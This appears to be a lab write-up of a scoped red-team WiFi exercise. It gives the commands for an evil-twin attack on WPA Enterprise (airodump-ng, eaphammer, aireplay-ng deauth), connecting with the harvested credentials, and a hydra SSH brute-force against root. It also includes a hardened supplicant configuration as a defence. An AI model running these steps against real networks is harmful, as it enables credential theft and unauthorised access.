Pivoting over WiFi: WPA Enterprise
Your Red Team is hired by Global Marine Services to test the security of their HQ. You are given the responsibility of assessing their WiFi network. The WiFi network might lead to the machines on their private LAN. Everything else is off-limits.
Objective: Break into the WiFi network and recover the flag kept on one of their LAN systems.
Start the usual iw dev dance to put the device into monitor mode and check for the networks using airodump-ng.
iw dev wlan0 set monitor none
airodump-ng wlan0

Start Eaphammer
./eaphammer -i wlan0 --channel 6 --auth wpa-eap --essid GlobalMarineServices --creds

Deauth the client
aireplay-ng -0 100 -a D2:E9:6A:D3:B3:50 wlan0 --ignore-negative-one

Check the eaphammer logs to see the client's credentials

Create a WPA supplicant file and connect to the network.
network={
ssid="GlobalMarineServices"
scan_ssid=1
key_mgmt=WPA-EAP
eap=TTLS
identity="daniel"
anonymous_identity="anon"
password="shipittoday"
phase2="auth=PAP"
}
Connect using the supplicant file:
wpa_supplicant -B -Dnl80211 -iwlan1 -c supplicant.conf
Use dhclient to get an IP address.
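The credential capture above only works because the client accepted the rogue AP's RADIUS server certificate and then sent its TTLS/PAP password inside that tunnel; with PAP the password travels in clear inside the tunnel, so validating the tunnel endpoint is the only thing protecting it. As an added example (not part of the original write-up), here is the client-side wpa_supplicant network block in its unpinned form beside one that validates the server; the CA file path and the RADIUS server name are assumed values.

```ini
# Weak: no ca_cert and no name check, so any server presenting any
# certificate is accepted. An evil twin running its own RADIUS terminates
# the TLS tunnel and reads the PAP password in clear.
network={
    ssid="GlobalMarineServices"
    key_mgmt=WPA-EAP
    eap=TTLS
    identity="daniel"
    anonymous_identity="anon"
    password="shipittoday"
    phase2="auth=PAP"
}

# Hardened: pin the issuing CA and the server's certificate name (assumed
# values), so the TLS handshake fails before phase 2 unless the genuine
# RADIUS server answers. The inner method is unchanged so the comparison
# isolates the server-validation settings.
network={
    ssid="GlobalMarineServices"
    key_mgmt=WPA-EAP
    eap=TTLS
    identity="daniel"
    anonymous_identity="anon"
    password="shipittoday"
    phase2="auth=PAP"
    ca_cert="/etc/ssl/certs/gms-radius-ca.pem"   # assumed path
    domain_match="radius.globalmarine.example"   # assumed server name
}
```

Use ca_cert and domain_match together: ca_cert alone still trusts any server certificate that CA has issued.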

An Nmap scan of the router reveals that port 80 is open. Curl port 80 to reveal the LAN address.

Scanning the router's LAN interface reveals that port 22 is open. Brute-force the SSH password with hydra, connect, and retrieve the flag.

hydra -l root -P /root/wordlists/100-common-passwords.txt ssh://192.37.6.4
